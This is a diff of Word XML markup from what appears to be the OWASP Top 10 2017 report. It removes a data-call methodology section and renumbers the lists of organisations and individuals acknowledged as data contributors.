+      <w:bookmarkStart w:id="146" w:name="_Toc496914315"/>
       <w:bookmarkEnd w:id="145"/>
-      <w:r>
-        <w:t>Public Data Call</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Traditionally, the data collected and analyzed was more </w:t>
-      </w:r>
-      <w:r>
-        <w:t>along the lines of frequency data; how many vulnerabilities found in tested applications. As is well known, tools traditionally report all instances found of a vulnerability and humans traditionally report a single finding with a number of examples. This m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>akes it very difficult to aggregate the two styles of reporting in a comparable manner.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t>For 2017, the incidence rate was calculated by how many applications in a given data set had one or more of a specific vulnerability type. The data from many larger con</w:t>
-      </w:r>
-      <w:r>
-        <w:t>tributors was provided in two views: The first was the traditional frequency style of counting every instance found of a vulnerability, the second was the count of applications that each vulnerability was found in (one or more time). While not perfect, thi</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">s reasonably allows us to compare the data from Human Assisted Tools and Tool Assisted Humans. The raw data and analysis work is </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId215">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>available in GitHub</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t>. We intend to expand on this wi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>th additional structure for 2020 (or earlier).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>We received 40+ submissions in the call for data, as many were from the original data call that was focused on frequency, we were able to use data from 23 contributors covering ~114,000 applications. We used a</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> one year block of time where possible and identified by the contributor. The majority of applications are unique, though we acknowledge the likelihood of some repeat applications between the yearly data from Veracode. The 23 datasets used were either iden</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">tified as tool assisted human testing or specifically provided incidence rate from human assisted tools. Anomalies in the selected data of 100%+ incidence were adjusted down to 100% max. To calculate the incidence rate, we calculated the percentage of the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>total applications there were found to contain each vulnerability type. The ranking of incidence was used for the prevalence calculation in the overall risk for ranking the Top 10. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="146" w:name="acknowledgements"/>
-      <w:bookmarkStart w:id="147" w:name="_Toc496719122"/>
-      <w:bookmarkEnd w:id="146"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Acknowledgements</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="146"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="147" w:name="acknowledgements-to-data-contributors"/>
       <w:bookmarkEnd w:id="147"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="148" w:name="acknowledgements-to-data-contributors"/>
-      <w:bookmarkEnd w:id="148"/>
       <w:r>
         <w:t>Acknowledgements to Data Contributors</w:t>
       </w:r>
@@ -14270,18 +14266,15 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">We'd like to thank </w:t>
-      </w:r>
-      <w:r>
-        <w:t>the many organizations that contributed their vulnerability data to support the 2017 update:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+        <w:t>We'd like to thank the many organizations that contributed their vulnerability data to support the 2017 update:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14293,7 +14286,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14305,7 +14298,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14317,7 +14310,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14329,7 +14322,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14341,7 +14334,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14353,7 +14346,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14365,19 +14358,22 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Colegio LaSalle Monteria</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Colegio LaSa</w:t>
+      </w:r>
+      <w:r>
+        <w:t>lle Monteria</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14389,7 +14385,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14401,7 +14397,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14413,7 +14409,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14425,7 +14421,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14437,7 +14433,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14449,7 +14445,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14461,7 +14457,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14473,7 +14469,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14485,7 +14481,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14497,7 +14493,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14509,7 +14505,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14521,7 +14517,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14533,7 +14529,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14545,7 +14541,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14557,7 +14553,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14569,7 +14565,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14581,7 +14577,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14593,7 +14589,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14605,7 +14601,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14617,7 +14613,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14629,7 +14625,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14641,7 +14637,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14653,7 +14649,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14665,7 +14661,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14677,7 +14673,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14689,7 +14685,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="72"/>
+          <w:numId w:val="71"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14702,11 +14698,108 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
+          <w:numId w:val="71"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>M. Limacher IT Dienstleistungen</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="71"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Osampa</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="71"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Atos</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="71"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>National Center for Cyber Security Technology</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="71"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>SHCP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">For the first time, all the data contributed to a Top 10 release, and the full list of contributors, is </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId215">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>publicly available</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="148" w:name="acknowledgements-to-individual-contribut"/>
+      <w:bookmarkEnd w:id="148"/>
+      <w:r>
+        <w:t>Acknowledgements to Individual Contributors</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>We'd like to thank the individual contributors who spent many hours collectively contributing to the Top 10 in GitHub.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
           <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>M. Limacher IT Dienstleistungen</w:t>
+        <w:t>ak47gen</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14718,7 +14811,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Osampa</w:t>
+        <w:t>davewichers</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14730,7 +14823,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Atos</w:t>
+        <w:t>itscooper</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14742,7 +14835,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>National Center for Cyber Security Technology</w:t>
+        <w:t>ossie-git</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14754,106 +14847,6 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>SHCP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">For the first time, all the data contributed to a Top 10 release, and the full list of contributors, is </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId216">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>publicly available</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="149" w:name="acknowledgements-to-individual-contribut"/>
-      <w:bookmarkEnd w:id="149"/>
-      <w:r>
-        <w:t>Acknowledgements to Individual Contributors</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t>We'd like to thank the individual contributors who spent many hours collectively contributing to the Top 1</w:t>
-      </w:r>
-      <w:r>
-        <w:t>0 in GitHub.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>ak47gen</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>davewichers</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>itscooper</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>ossie-git</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
         <w:t>tghosth</w:t>
       </w:r>
     </w:p>
@@ -14862,7 +14855,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14874,7 +14867,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14886,7 +14879,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14898,7 +14891,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14910,7 +14903,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14922,7 +14915,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14934,7 +14927,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14946,7 +14939,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14958,7 +14951,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14970,19 +14963,22 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>toddgrotenhuis</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>tod</w:t>
+      </w:r>
+      <w:r>
+        <w:t>dgrotenhuis</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -14994,7 +14990,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15006,7 +15002,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15018,7 +15014,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15030,7 +15026,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15042,7 +15038,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15054,7 +15050,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15066,7 +15062,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15078,7 +15074,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15090,7 +15086,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15102,7 +15098,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15114,7 +15110,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15126,7 +15122,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15138,7 +15134,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15151,7 +15147,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15163,7 +15159,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15175,7 +15171,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15187,7 +15183,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15199,7 +15195,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15211,7 +15207,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15223,7 +15219,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15235,7 +15231,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15247,7 +15243,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15259,7 +15255,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15271,7 +15267,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15283,7 +15279,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15295,7 +15291,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15307,7 +15303,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15319,7 +15315,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15331,7 +15327,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="73"/>
+          <w:numId w:val="72"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -15342,31 +15338,171 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="150" w:name="references-11"/>
-      <w:bookmarkStart w:id="151" w:name="_Toc496719123"/>
-      <w:bookmarkEnd w:id="150"/>
+      <w:bookmarkStart w:id="149" w:name="references-11"/>
+      <w:bookmarkStart w:id="150" w:name="_Toc496914316"/>
+      <w:bookmarkEnd w:id="149"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>References</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="150"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
